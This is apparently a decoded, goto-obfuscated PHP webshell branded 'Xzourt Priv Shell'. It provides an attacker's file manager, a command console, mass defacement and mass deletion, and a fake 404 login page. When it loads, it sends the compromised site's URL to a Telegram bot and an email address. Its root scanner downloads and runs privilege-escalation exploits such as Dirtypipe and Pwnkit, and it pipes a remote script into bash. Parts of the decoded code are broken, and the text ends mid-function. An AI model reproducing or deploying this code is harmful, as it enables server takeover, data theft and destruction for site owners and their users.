\x9<td class="text-center">action</td>\xa \x9</tr>\xa\x9 </thead>\xa\x9 <tbody class="text-nowrap">
\x9 <tr>\xa\x9 <td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=" . dirname($dir) . "">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center">\xa <div class="btn-group">
\x9 <a class="btn btn-outline-light btn-sm" href="?filenew&path=" . $dir . ""><i class="bi bi-file-earmark-plus-fill"></i></a>\xa \x9 <a class="btn btn-outline-light btn-sm" href="?dirnew&path=" . $dir . ""><i class="bi bi-folder-plus"></i></a>
\x9 </div>\xa\x9 </td>
\x9 </tr>"; goto d3JjR; H2vUy: $xtx = $data; goto PjodP; avrpj: ini_set("memory_limit", "64M"); goto e0M_f; GM5Lw: $pesan_alert = "[ {$x_path} ]"; goto cmezN; taJBV: $wget = exe("wget --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto i4QHr; GdxU5: function w($dir, $perm) { if (!is_writable($dir)) { return "<rd>" . $perm . "</rd>"; } else { return "<gr>" . $perm . "</gr>"; } } goto d03Rs; mVBqX: @ini_set("max_execution_time", 0); goto gczsm; RkY6o: function p($file) { $p = fileperms($file); if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto x5wmL; wpPmE: if ($_7["action"] == "rename") { s(); echo "
\x9 <div class='btn-group'>
\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9 \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>
\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$file}'><i class='bi bi-download'></i></a>\xa \x9</div>
<br>
\x9 <i class='bi bi-file-earmark'></i>: " . basename($file) . "\xa\x9\x9</br>\xa\x9\x9<form method='POST'>
<div class='input-group'>\xa \x9\x9<input class='form-control btn-sm' type='text' name='new_name' value='" . basename($file) . "' {$_r}>
\x9\x9 <button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button>
\x9\x9</div>\xa\x9\x9</form>"; } goto UQq_F; vbV3q: $_r = "required='required'"; goto BZcMI; f20ej: @ini_set("display_errors", 0); goto Lw2_l; McQhW: $py = exe("python --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto JpEYZ; OcHn3: $telegram = "on"; goto a2ryI; gUvZY: if (empty($disfunc)) { $disfc = "<gr>NONE</gr>"; } else { $disfc = "<rd>{$disfunc}</rd>"; } goto viHFv; viHFv: if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto XqpqE; qKf4D: echo "
<div class='container-fluid'>\xa \x9<div class='corner anu'>
\x9<b data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'><i class='bi bi-info-circle'></i> info server <i class='bi bi-chevron-down'></i></b>\xa\x9\x9\x9</div>
\x9\x9<div class='collapse text-dark mb-3' id='collapseExample'>\xa \x9\x9 <div class='box shadow bg-light p-3 rounded-3'>\xa \x9 \x9System: <gr>" . php_uname() . "</gr><br>\xa \x9 Software: <gr>" . $_SERVER["SERVER_SOFTWARE"] . "</gr><br>
\x9\x9\x9 PHP version: <gr>" . PHP_VERSION . "</gr> <a class='text-decoration-none' href='?dir={$path}&id=phpinfo'>[ PHPINFO ]</a> PHP os: <gr>" . PHP_OS . "</gr><br>
\x9\x9\x9\x9Server Ip: <gr>" . gethostbyname($_SERVER["HTTP_HOST"]) . "</gr><br>\xa\x9\x9 \x9Your Ip: <gr>" . ia() . "</gr><br>\xa \x9User: <gr>{$user}</gr> ({$uid}) | Group: <gr>{$group}</gr> ({$gid})<br>
\x9\x9 Safe Mode: {$sm}<br>\xa\x9\x9\x9 MySQL: {$sql} | Perl: {$pl} | Python: {$py} | WGET: {$wget} | CURL: {$curl}<br>\xa\x9\x9\x9 Disable Function:<br><pre>{$disfc}</pre>\xa\x9 \x9</div>
\x9 </div>
\x9 </div>
\x9 <div class='text-center'>
\x9 <div class='btn-group'>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=deface'><i class='bi bi-exclamation-diamond'></i> Mass deface</a>
\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\xa\x9\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Console</a>\xa </div>
\x9 <div class='btn-group'>
\x9 \x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=scan_root'><i class='bi bi-search'></i> Scan root</a>\xa \x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=network'><i class='bi bi-hdd-network'></i> Network</a>
\x9\x9 <a class='btn btn-outline-light btn-sm' href='?left'><i class='bi bi-box-arrow-in-left'></i> Logout</a>\xa </div>\xa \x9</div>"; goto KnAgU; x5wmL: if (isset($_7["dir"])) { $dir = $_7["dir"]; chdir($dir); } else { $dir = $gcw(); } goto xc3qc; UQq_F: if ($_7["action"] == "delete_file") { s(); if ($_7["yeahx"]) { $delete = unlink($file); if ($delete) { echo "<strong>Delete file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Delete file</strong> fail! " . er() . "</div>"; } } echo "
\x9\x9<div class='btn-group mb-3'>\xa \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa \x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa \x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$file}'><i class='bi bi-download'></i></a>\xa\x9\x9</div>
\x9 <div class='card card-body text-dark input-group mb-3'>\xa\x9 <p>Are you sure to delete : " . basename($file) . " ?</p>
\x9 \x9<form method='POST'>
\x9 \x9 <a class='btn btn-danger btn-block btn-sm' href='?dir={$dir}'>No</a>\xa \x9<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>\xa\x9 \x9</form>
\x9\x9</div>"; } goto LBZGy; XzF7p: if (isset($_7["left"])) { session_start(); session_destroy(); echo "<script>window.location="" . $_SERVER["PHP_SELF"] . "";</script>"; } goto HYFWh; idnUM: $inipass = "eGNoYW4xMjNA"; goto dVZti; XqpqE: $sm = @ini_get(strtolower("safe_mode")) == "on" ? "<rd>ON</rd>" : "<gr>OFF</gr>"; goto qKf4D; xIYwS: session_start(); goto VVBQf; e8qd0: $to = "[email protected]"; goto RkUOz; GGQ1Y: @ini_set("error_log", null); goto Ao2uT; wULVu: $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto fEjCS; HYFWh: if (isset($_7["opn"]) && $_7["opn"] != '' && $_7["action"] == "download") { @ob_clean(); $file = $_7["opn"]; header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto GdxU5; e0M_f: header("Content-Type: text/html; charset=UTF-8"); goto e8qd0; RkUOz: $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto GM5Lw; ajmYY: function ia() { $ia = ''; if (getenv("HTTP_CLIENT_IP")) { $ia = getenv("HTTP_CLIENT_IP"); } else { if (getenv("HTTP_X_FORWARDED_FOR")) { $ia = getenv("HTTP_X_FORWARDED_FOR"); } else { if (getenv("HTTP_X_FORWARDED")) { $ia = getenv("HTTP_X_FORWARDED"); } else { if (getenv("HTTP_FORWARDED_FOR")) { $ia = getenv("HTTP_FORWARDED_FOR"); } else { if (getenv("HTTP_FORWARDED")) { $ia = getenv("HTTP_FORWARDED"); } else { if (getenv("REMOTE_ADDR")) { $ia = getenv("REMOTE_ADDR"); } else { $ia = "Unknown IP."; } } } } } } return $ia; } goto uJh3k; wciV1: if ($_7["action"] == "view") { s(); echo "
<div class='btn-group'>\xa\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye-fill'></i></a>\xa \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>
\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$file}'><i class='bi bi-download'></i></a>\xa\x9 </div>
<br>\xa \x9<i class='bi bi-file-earmark'></i>: " . basename($file) . "
\x9\x9</br>
\x9\x9<div class='bg-dark'>\xa\x9 <div class='container-fluid language-javascript'>
\x9 \x9 <textarea rows='10' class='form-control' disabled=''>" . htmlspecialchars(file_get_contents($file)) . "</textarea>\xa \x9</div>
</div>"; } goto KHzp9; PUide: function er() { echo "<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto UPxMA; LBZGy: if ($_7["action"] == "delete_folder") { s(); if ($_7["yeah"]) { if (is_dir($dir)) { if (is_writable($dir)) { @rmdir($dir); @exe("rm -rf {$dir}"); @exe("rmdir /s /q {$dir}"); echo "<strong>Delete folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Delete folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } } echo "
<div class='btn-group mb-3'>
\x9 \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa </div>\xa\x9 <div class='card card-body text-dark input-group mb-3'>
\x9<p>Are you sure to delete : " . basename($dir) . " ?</p>
\x9 \x9<form method='POST'>
\x9\x9\x9<a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>No</a>\xa \x9\x9 <input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>\xa </form>\xa\x9\x9</div>"; } goto sYXiW; KnAgU: if (isset($_7["dir"])) { $dir = $_7["dir"]; chdir($dir); } else { $dir = $gcw(); } goto l_7Kw; d3JjR: foreach ($scand as $dir) { $dt = date("Y-m-d G:i", filemtime("{$path}/{$dir}")); if (strlen($dir) > 25) { $_d = substr($dir, 0, 25) . "..."; } else { $_d = $dir; } if (function_exists("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner("{$path}/{$dir}")); $downer = $downer["name"]; } else { $downer = fileowner("{$path}/{$dir}"); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}")); $dgrp = $dgrp["name"]; } else { $dgrp = filegroup("{$path}/{$dir}"); } if (!is_dir($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "\xa\x9 <tr>
\x9 \x9<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href='?dir={$path}/{$dir}'>{$_d}</a></td>\xa\x9\x9\x9<td class='text-center'>dir</td>\xa\x9 \x9<td class='text-center'>{$dt}</td>
\x9<td class='text-center'>-</td>\xa\x9 <td class='text-center'>{$downer}<gr>/</gr>{$dgrp}</td>\xa \x9 <td class='text-center'>"; if (is_writable($path . "/" . $dir)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $dir)) { echo "<rd>"; } echo p($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font></center></td>"; } echo "\xa \x9\x9<td class='text-center'>\xa \x9\x9<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}/{$dir}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a><a class='btn btn-outline-light btn-sm' href='?dir={$path}/{$dir}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
\x9\x9</div>\xa \x9</td>\xa </tr>"; } goto n4wge; octvi: $sql = function_exists("mysql_connect") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto LAdCu; U8rFL: ?>
<div class="text-secondary"> Xzourt Webshell Company</div>Did this file decode correctly?
Original Code
<?
goto xIYwS; heAIF: @ini_set("display_errors", 0); goto qLV0I; JpEYZ: $disfunc = @ini_get("disable_functions"); goto gUvZY; sYXiW: if (isset($_7["filenew"])) { s(); if (isset($_7["bikin"])) { $name = $_7["name_file"]; $contents_file = $_7["contents_file"]; foreach ($name as $name_file) { $handle = @fopen("{$name_file}", "w"); if ($contents_file) { $create = @fwrite($handle, $contents_file); } else { $create = $handle; } } if ($create) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } echo "\xa\x9 <div class='mb-3'>
\x9 <form method='POST'>\xa \x9\x9 <i class='bi bi-file-earmark'></i> Filename:\xa \x9\x9 <input class='form-control form-control-sm' type='text' name='name_file[]' placeholder='filename' {$_r}>\xa \x9\x9\x9<i class='bi bi-file-earmark'></i> Your script:
\x9 \x9\x9<textarea class='form-control form-control-sm' name='contents_file' rows='7' placeholder='your script' {$_r}></textarea>
<div class='d-grid gap-2'>
\x9\x9\x9\x9\x9<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'>
\x9 </div>
\x9\x9 </form>
</div>"; } goto cBTCn; EI0T7: if (isset($_7["r_f"])) { $old = $file; $new = $_7["new_name"]; rename($new, $old); if (file_exists($new)) { echo "<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">\xa\x9 <strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\xa \x9</div>"; } else { if (rename($old, $new)) { echo "<strong>Rename file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Rename file</strong> fail! " . er() . "</div>"; } } } goto wpPmE; a2ryI: if ($telegram == "on") { $send = array("chat_id" => $chatId, "text" => $xtx); $web_telegram = "https://api.telegram.org/{$botUrl}"; $ch = curl_init($web_telegram . "/sendMessage"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $send); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); } goto U8rFL; PjodP: $chatId = "1612424585"; goto XPEKY; i4QHr: $pl = exe("perl --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto McQhW; dVZti: function Login() { ?>
<html><head><body><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><style>input{margin:0;background-color:#fff;border:1px solid #fff}</style><pre align="center"><form method="post"><input name="p"type="password"></form></pre></body></html><?php die; } goto mpJld; lZheg: if ($_7["action"] == "rename_folder") { if ($_7["r_d"]) { $r_d = rename($dir, '' . dirname($dir) . "/" . htmlspecialchars($_7["r_d"]) . ''); if ($r_d) { echo "<strong>Rename folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Rename folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } s(); echo "\xa\x9 <div class='btn-group'>\xa\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa\x9 </div>\xa\x9\x9<br>\xa \x9\x9<i class='bi bi-folder-fill'></i>: " . basename($dir) . "\xa </br>
\x9 <form method='POST'>
\x9\x9\x9<div class='input-group'>\xa \x9\x9<input class='form-control btn-sm' type='text' value='" . basename($dir) . "' name='r_d' {$_r}>
\x9\x9<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>\xa\x9 \x9</div>\xa\x9 </form>"; } goto EI0T7; N3tWO: $paths = explode("/", $path); goto jZCJP; xc3qc: echo "\xa<html>
<head>\xa\x9 <meta charset='UTF-8'>\xa \x9<meta name='author' content='UnknownSec'>\xa \x9<meta name='viewport' content='width=device-width, initial-scale=0.70'>
\x9\x9<link rel='stylesheet' href='//xnxx.co.ws/meki.css'>
\x9<link rel='icon' href='//xnxx.co.ws/anya.jpg'>
\x9\x9<title>{ Xzourt Priv Shell }</title>\xa\x9\x9<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>
\x9 <script src='//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>\xa\x9 <script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\xa\x9</head>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
\x9<div class='box shadow bg-dark p-4 rounded-3'>
\x9 \x9<a class='text-decoration-none text-light anu' href='" . $_SERVER["PHP_SELF"] . "'><h4>404 Priv Shell</h4></a>"; goto Hzffk; XPEKY: $botUrl = "bot5826555844:AAHn6k0eF4OADoMj1Jx1WAGAtT9XlDeLsDE"; goto OcHn3; wB9pF: if ($_7["action"] == "edit") { s(); echo "
\x9\x9<div class='btn-group'>
\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa \x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$file}'><i class='bi bi-download'></i></a>
\x9\x9</div>
\x9 <br>
\x9\x9\x9<i class='bi bi-file-earmark'></i>: " . basename($file) . "
\x9</br>\xa\x9\x9<form method='POST'>\xa \x9<textarea class='form-control btn-sm' rows='10' name='contents' {$_r}>" . htmlspecialchars(file_get_contents($file)) . "</textarea>\xa \x9\x9<div class='d-grid gap-2'>
<button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button>\xa\x9 \x9</div>
</form>"; } goto lZheg; Lw2_l: set_time_limit(0); goto avrpj; l_7Kw: $dir = str_replace("\", "/", $dir); goto UtA_L; gczsm: @ini_set("output_buffering", 0); goto heAIF; YMRzT: function exe_root($set, $sad) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/" . $xx . "/i", $set)) { $set = $set . " " . $xx; } $a = "function_exists"; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink, $sad); return $d($pink[1]); } else { return "proc_open function is disabled !"; } } goto RkY6o; BZcMI: $gcw = "getcwd"; goto idnUM; o8bBX: if (isset($_GET["dir"]) && $_GET["id"] == "scan_root") { ob_implicit_flush(); ob_end_flush(); s(); echo "\xa\x9\x9 <div class='text-center'>
\x9\x9\x9\x9<div class='btn-group mb-3'>\xa\x9 <a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=autoscan'><i class='bi bi-bug'></i> Auto scan</a>\xa\x9 \x9\x9 <a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=scansd'><i class='bi bi-search'></i> Scan SUID</a>
\x9 \x9 <a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=esg'><i class='bi bi-search'></i> Exploit suggester</a>
\x9\x9 </div>\xa \x9</div>"; if (!function_exists("proc_open")) { echo "<center class='anu'>Command is Disabled !</center>"; } if (!is_writable($path)) { echo "<center class='anu'>Current Directory is Unwriteable !</center>"; } if (isset($_GET["id_two"]) && $_GET["id_two"] == "autoscan") { if (!file_exists($path . "/rooting/")) { mkdir($path . "/rooting"); exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $path . "/rooting"); exe_root("tar -xf auto.tar.gz", $path . "/rooting"); if (!file_exists($path . "/rooting/netfilter")) { die("<center class='anu'>Failed to Download Material !</center>"); } } echo "
\x9\x9\x9 <div class="container-fluid language-javascript">\xa \x9 <div class="shell mb-3">
\x9\x9 \x9 <pre style="font-size:10px;"><code>Netfilter : " . exe_root("timeout 10 ./rooting/netfilter", $path) . "Ptrace : " . exe_root("echo id | timeout 10 ./rooting/ptrace", $path) . "Sequoia : " . exe_root("timeout 10 ./rooting/sequoia", $path) . "OverlayFS : " . exe_root("echo id | timeout 10 ./overlayfs", $path . "/rooting") . "Dirtypipe : " . exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path) . "Sudo : " . exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path) . "Pwnkit : " . exe_root("echo id | timeout 10 ./pwnkit", $path . "/rooting") . '' . exe_root("rm -rf rooting", $path) . "</code></pre>\xa\x9 \x9\x9\x9</div>\xa \x9\x9\x9</div>"; } elseif (isset($_GET["id_two"]) && $_GET["id_two"] == "scansd") { echo "<center class="anu">[+] Scanning ...</center>"; echo "
\x9\x9\x9<div class="container-fluid language-javascript">
\x9 \x9\x9 <div class="shell mb-3">
\x9\x9\x9\x9 \x9<pre style="font-size:10px;"><code>" . exe_root("find / -perm -u=s -type f 2>/dev/null", $path) . "</code></pre>
\x9 \x9\x9 </div>\xa \x9 \x9</div>"; } elseif (isset($_GET["id_two"]) && $_GET["id_two"] == "esg") { echo "<center class="anu">[+] Loading ...</center>"; echo "\xa\x9\x9\x9 <div class="container-fluid language-javascript">
\x9 \x9 \x9<div class="shell mb-3">
\x9 <pre style="font-size:10px;"><code>" . exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $path) . "</code></pre>\xa \x9 </div>\xa\x9\x9 </div>"; } } goto E1CyH; cmezN: mail($to, "XZOURT WEBSHELL COMPANY", $pesan_alert, "[ " . php_uname() . " ]"); goto wULVu; ItSPn: error_reporting(0); goto GGQ1Y; Ao2uT: @ini_set("log_errors", 0); goto mVBqX; Hzffk: if (isset($_7["path"])) { $path = $_7["path"]; chdir($path); } else { $path = $gcw(); } goto KYKN5; UPxMA: function sz($byt) { $typ = array("B", "KB", "MB", "GB", "TB"); for ($i = 0; $byt >= 1024 && $i < count($typ) - 1; $byt /= 1024, $i++) { } return round($byt, 2) . " " . $typ[$i]; } goto ajmYY; d03Rs: function s() { echo "<style>table{display:none;}</style><div class="table-responsive"><hr></div>"; } goto o8GGc; KHzp9: if (isset($_7["edit_file"])) { $updt = fopen("{$file}", "w"); $result = fwrite($updt, $_7["contents"]); if ($result) { echo "<strong>Edit file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Edit file</strong> fail! " . er() . "</div>"; } } goto wB9pF; laih7: $scand = scandir($path); goto skUzm; o8GGc: function ok() { echo "<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto PUide; fEjCS: $data = "< < \xf0\235\x90\221\xf0\235\x90\x84\360\x9d\x90\x92\360\235\x90\x94\xf0\235\x90\213\xf0\x9d\220\223 \360\x9d\220\x96\360\235\220\x84\360\235\x90\x81\360\235\x90\x92\360\x9d\x90\x87\360\x9d\220\204\360\235\x90\213\xf0\x9d\x90\213 > >\360\237\x94\220
\xaAkses: {$x_path} \xa"; goto H2vUy; Aif8H: @ini_set("output_buffering", 0); goto f20ej; jZCJP: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' href='?path=/'>/</a>"; continue; } if ($pat == '') { continue; } echo "<a class='text-decoration-none' href='?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "'>" . $pat . "</a>/"; } goto laih7; uJh3k: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto YMRzT; VVBQf: set_time_limit(0); goto ItSPn; cBTCn: if (isset($_7["dirnew"])) { s(); if (isset($_7["create"])) { $name = $_7["name_dir"]; foreach ($name as $name_dir) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $name_dir); $fd = @mkdir($folder); } if ($fd) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Create dir</strong> fail! " . er() . "</div>"; } } echo "
<div class='mb-3'>\xa \x9 <form method='POST'>\xa \x9\x9<i class='bi bi-folder'></i> Name directory:\xa \x9\x9<div class='input-group mb-3'>
\x9\x9\x9 \x9<input class='form-control form-control-sm' type='text' name='name_dir[]' placeholder='Dir name' {$_r}>
\x9\x9 <input class='btn btn-outline-light btn-sm' type='submit' name='create' value='create dir'>
\x9 </div>
\x9 </form>
\x9 </div>"; } goto jK5Gg; LAdCu: $curl = function_exists("curl_version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto taJBV; E1CyH: if (isset($_7["opn"])) { $file = $_7["opn"]; } goto wciV1; KYKN5: $path = str_replace("\", "/", $path); goto N3tWO; UtA_L: $scdir = explode("/", $dir); goto tFC8Q; mpJld: if (!isset($_SESSION[base64_encode($_SERVER["HTTP_HOST"])])) { if (empty($inipass) || isset($_7["p"]) && base64_encode($_7["p"]) == $inipass) { $_SESSION[base64_encode($_SERVER["HTTP_HOST"])] = true; } else { Login(); } } goto XzF7p; binbg: $_7 = array_merge($_POST, $_GET); goto vbV3q; tFC8Q: for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } if ($_7["id"] == "deface") { function mass_all($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { file_put_contents($, $contents_sc); } elseif ($dirb === "..") { file_put_contents($, $contents_sc); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$}<br>"; file_put_contents($, $contents_sc); $ = mass_all($dirc, $namefile, $contents_sc); } } } } } } function mass_onedir($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { file_put_contents($, $contents_sc); } elseif ($dirb === "..") { file_put_contents($, $contents_sc); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$dirb}/{$namefile}<br>"; file_put_contents($, $contents_sc); } } } } } } if ($_7["start"]) { if ($_7["tipe"] == "mass") { mass_all($_7["d_dir"], 